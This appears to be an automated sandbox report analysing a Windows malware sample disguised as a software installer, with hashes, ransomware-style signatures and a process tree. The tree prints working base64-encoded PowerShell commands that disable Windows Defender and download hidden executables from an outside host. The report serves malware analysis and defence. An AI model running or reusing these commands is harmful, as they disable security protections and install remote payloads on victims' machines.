Analysis

  • max time kernel
    1s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-02-2024 04:41

General

  • Target

    cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe

  • Size

    4.8MB

  • MD5

    9803950281290044e32fb78605c129b5

  • SHA1

    133f587df70680d81c18d8c112b9a34e6041d629

  • SHA256

    cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b

  • SHA512

    b5be7c8710a6dfea3fafc85cd10881c62be587607be8f05a61f9bf6aa88456c8c1dd694c85dd5707cd5518bb2f87f077824e410c24f081fab30ea13572de3c21

  • SSDEEP

    98304:pWFsTuRN2zazBLlLvOc1Pgd1E20fzsFvOF3BQQi4y0g1ea6:pWFsTuRN2zahf1Y7EhZSlI

Score
9/10

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
    "C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe"
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2216
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2024.02.07\990F4DC\FreeSoftPlace.msi MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707481120 " AI_EUIMSI=""
      2⤵
        PID:4604
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding B5FBFB3C3EDC8B8F61A25D29DAC5C89A C
        2⤵
        • Loads dropped DLL
        PID:4512
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding D9151CF6A366954F41CF4EE4E699A4BC
        2⤵
          PID:464
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4E13.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4E10.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4E11.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4E12.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
            3⤵
              PID:4772
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAKAAtAE4AbwB0ACAAJAAoACQAKAB3AGgAbwBhAG0AaQApACAALQBlAHEAIAAiAG4AdAAgAGEAdQB0AGgAbwByAGkAdAB5AFwAcwB5AHMAdABlAG0AIgApACkAIAB7AAoAIAAgACAAIAAkAEkAcwBTAHkAcwB0AGUAbQAgAD0AIAAkAGYAYQBsAHMAZQAKAAoAIAAgACAAIABpAGYAIAAoAC0ATgBvAHQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AIABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACcAKQApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAGAAIgAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBNAHkAQwBvAG0AbQBhAG4AZAAuAFAAYQB0AGgAIAArACAAIgBgACIAIAAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBVAG4AYgBvAHUAbgBkAEEAcgBnAHUAbQBlAG4AdABzAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwALgBlAHgAZQAgAC0AVgBlAHIAYgAgAFIAdQBuAGEAcwAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABFAHgAaQB0AAoAIAAgACAAIAB9AAoACgAgACAAIAAgACQAcABzAGUAeABlAGMAXwBwAGEAdABoACAAPQAgACQAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIABQAHMARQB4AGUAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAJwBpAGcAbgBvAHIAZQAnACkALgBTAG8AdQByAGMAZQAgAAoAIAAgACAAIABpAGYAKAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiACAALQBpACAALQBzACAAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMAIAAKACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABDAG8AbQBtAGEAbgBkAEwAaQBuAGUACgAgACAAIAAgACAAIAAgACAAZQB4AGkAdAAKACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAB9AAoACgB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAdAByAHUAZQAKAH0ACgAKADYANwAuAC4AOQAwAHwAZgBvAHIAZQBhAGMAaAAtAG8AYgBqAGUAYwB0AHsACgAgACAAIAAgACQAZAByAGkAdgBlACAAPQAgAFsAYwBoAGEAcgBdACQAXwAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAgACAAIAAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAiACQAKAAkAGQAcgBpAHYAZQApADoAXAAqACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgB9AAoACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBIAGkAZwBoAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAKACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoACgAkAHMAdgBjAF8AbABpAHMAdAAgAD0AIABAACgAIgBXAGQATgBpAHMAUwB2AGMAIgAsACAAIgBXAGkAbgBEAGUAZgBlAG4AZAAiACwAIAAiAFMAZQBuAHMAZQAiACkACgBmAG8AcgBlAGEAYwBoACgAJABzAHYAYwAgAGkAbgAgACQAcwB2AGMAXwBsAGkAcwB0ACkAIAB7AAoAIAAgACAAIABpAGYAKAAkACgAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABzAHYAYwAiACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAaQBmACgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAHMAdgBjACIAKQAuAFMAdABhAHIAdAAgAC0AZQBxACAANAApACAAewAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAcwB2AGMAIgAgAC0ATgBhAG0AZQAgAFMAdABhAHIAdAAgAC0AVgBhAGwAdQBlACAANAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAfQAKAH0ACgAKACQAZAByAHYAXwBsAGkAcwB0ACAAPQAgAEAAKAAiAFcAZABuAGkAcwBEAHIAdgAiACwAIAAiAHcAZABmAGkAbAB0AGUAcgAiACwAIAAiAHcAZABiAG8AbwB0ACIAKQAKAGYAbwByAGUAYQBjAGgAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAdgBfAGwAaQBzAHQAKQAgAHsACgAgACAAIAAgAGkAZgAoACQAKABUAGUAcwB0AC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAGQAcgB2ACIAKQApACAAewAKACAAIAAgACAAIAAgACAAIABpAGYAKAAgACQAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAZAByAHYAIgApAC4AUwB0AGEAcgB0ACAALQBlAHEAIAA0ACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABkAHIAdgAiACAALQBOAGEAbQBlACAAUwB0AGEAcgB0ACAALQBWAGEAbAB1AGUAIAA0AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABuAGUAZQBkAF8AcgBlAGIAbwBvAHQAIAA9ACAAJABmAGEAbABzAGUACgAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAB9AAoAfQAKAAoAaQBmACgAJAAoAEcARQBUAC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgAFcAaQBuAEQAZQBmAGUAbgBkACkALgBTAHQAYQB0AHUAcwAgAC0AZQBxACAAIgBSAHUAbgBuAGkAbgBnACIAKQAgAHsAIAAgACAACgAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoAfQA=
                4⤵
                  PID:368
                  • C:\Windows\system32\chcp.com
                    "C:\Windows\system32\chcp.com" 1252
                    5⤵
                      PID:1892
                    • C:\Windows\system32\whoami.exe
                      "C:\Windows\system32\whoami.exe"
                      5⤵
                        PID:2900
                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss5BE3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5BE0.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5BE1.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr5BE2.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                    3⤵
                      PID:1892
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBmAGkAbABlAHMALgBmAHIAZQBlAHMAbwBmAHQAcABsAGEAYwBlAC4AYwBvAG0ALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAA==
                        4⤵
                          PID:1496
                          • C:\Windows\system32\chcp.com
                            "C:\Windows\system32\chcp.com" 1252
                            5⤵
                              PID:2588
                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                          -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6EA5.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6EA2.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6EA3.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6EA4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                          3⤵
                            PID:2692
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBmAGkAbABlAHMALgBmAHIAZQBlAHMAbwBmAHQAcABsAGEAYwBlAC4AYwBvAG0ALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
                              4⤵
                                PID:3812
                                • C:\Windows\system32\chcp.com
                                  "C:\Windows\system32\chcp.com" 1252
                                  5⤵
                                    PID:2368
                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7F83.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7F80.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7F81.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7F82.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                3⤵
                                  PID:5568
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcA
                                    4⤵
                                      PID:5736
                                      • C:\Windows\system32\chcp.com
                                        "C:\Windows\system32\chcp.com" 1252
                                        5⤵
                                          PID:6008
                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                      -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssA07D.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiA06B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrA06C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrA06D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                      3⤵
                                        PID:5344
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc 